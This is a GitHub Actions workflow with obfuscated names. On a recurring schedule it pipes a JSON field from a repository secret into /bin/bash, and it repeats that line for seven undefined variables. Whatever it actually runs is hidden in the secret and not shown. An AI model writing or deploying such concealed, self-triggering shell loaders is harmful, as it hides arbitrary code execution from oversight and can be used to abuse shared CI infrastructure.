name: haosiwen19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '58 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haosiwen19871010
        env:
          jyow50: ${{ secrets.jyow50 }}
        run: |
          echo $jyow50 | jq -r .hulha25 | /bin/bash
          echo $auj09 | jq -r .lq83 | /bin/bash
          echo $sybq18346 | jq -r .trr1 | /bin/bash
          echo $m87 | jq -r .a692 | /bin/bash
          echo $echv880 | jq -r .m5 | /bin/bash
          echo $jrt50647 | jq -r .chltn81355 | /bin/bash
          echo $y37257 | jq -r .yaji428 | /bin/bash
          echo $dadz304 | jq -r .h7960 | /bin/bash

